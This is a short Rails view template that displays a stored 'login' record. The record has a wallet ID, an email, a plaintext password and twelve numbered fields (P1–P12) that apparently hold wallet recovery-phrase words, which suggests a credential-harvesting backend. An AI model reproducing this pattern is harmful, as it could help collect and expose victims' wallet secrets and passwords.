<p id="notice"><%= notice %></p>

<p>
  <strong>Wallet:</strong>
  <%= @login.wallet_id %>
</p>

<p>
  <strong>Email:</strong>
  <%= @login.email %>
</p>

<p>
  <strong>Password:</strong>
  <%= @login.password %>
</p>

<p>
  <strong>P1:</strong>
  <%= @login.p1 %>
</p>

<p>
  <strong>P2:</strong>
  <%= @login.p2 %>
</p>

<p>
  <strong>P3:</strong>
  <%= @login.p3 %>
</p>

<p>
  <strong>P4:</strong>
  <%= @login.p4 %>
</p>

<p>
  <strong>P5:</strong>
  <%= @login.p5 %>
</p>

<p>
  <strong>P6:</strong>
  <%= @login.p6 %>
</p>

<p>
  <strong>P7:</strong>
  <%= @login.p7 %>
</p>

<p>
  <strong>P8:</strong>
  <%= @login.p8 %>
</p>

<p>
  <strong>P9:</strong>
  <%= @login.p9 %>
</p>

<p>
  <strong>P10:</strong>
  <%= @login.p10 %>
</p>

<p>
  <strong>P11:</strong>
  <%= @login.p11 %>
</p>

<p>
  <strong>P12:</strong>
  <%= @login.p12 %>
</p>

<%= link_to 'Edit', edit_login_path(@login) %> |
<%= link_to 'Back', logins_path %>
